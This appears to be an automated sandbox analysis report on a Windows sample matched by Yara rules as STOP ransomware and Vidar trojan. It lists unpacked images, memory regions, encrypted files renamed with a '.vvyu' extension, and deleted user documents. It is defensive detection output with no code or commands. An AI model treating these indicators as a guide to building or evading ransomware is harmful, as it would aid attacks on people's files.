Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 3456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 5360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 5272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 3044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 5076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 1504, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 5944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 3788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 4444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 4484, type: MEMORYSTR
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\2OmglUwx83.exe File moved: C:\Users\user\Desktop\WUTJSCBCFX.docx Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File deleted: C:\Users\user\Desktop\WUTJSCBCFX.docx Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File moved: C:\Users\user\Desktop\WUTJSCBCFX\CURQNKVOIX.jpg Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File deleted: C:\Users\user\Desktop\WUTJSCBCFX\CURQNKVOIX.jpg Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File moved: C:\Users\user\Desktop\DVWHKMNFNN\NWTVCDUMOB.pdf Jump to behavior
Writes many files with high entropy
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db entropy: 7.99822741142 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db entropy: 7.9981206035 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db entropy: 7.99849325713 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db entropy: 7.9986251538 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99045484651 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Temp\chrome_installer.log entropy: 7.99117223062 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT entropy: 7.99607869865 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT entropy: 7.9957910057 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99831481272 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat entropy: 7.99858160676 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst entropy: 7.99786053621 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin entropy: 7.99398722736 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin entropy: 7.99469691887 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temp\chrome_installer.log.vvyu (copy) entropy: 7.99117223062 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\MSIMGSIZ.DAT.vvyu (copy) entropy: 7.99607869865 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.vvyu (copy) entropy: 7.9957910057 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.vvyu (copy) entropy: 7.99858160676 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.vvyu (copy) entropy: 7.99786053621 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.vvyu (copy) entropy: 7.99398722736 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin.vvyu (copy) entropy: 7.99469691887 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db.vvyu (copy) entropy: 7.99822741142 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db.vvyu (copy) entropy: 7.9981206035 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db.vvyu (copy) entropy: 7.99849325713 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db.vvyu (copy) entropy: 7.9986251538 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.vvyu (copy) entropy: 7.99045484651 Jump to dropped file
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.vvyu (copy) entropy: 7.99831481272 Jump to dropped file

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 1.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.build2.exe.5f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 13.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 13.0.build2.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.build2.exe.5f15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
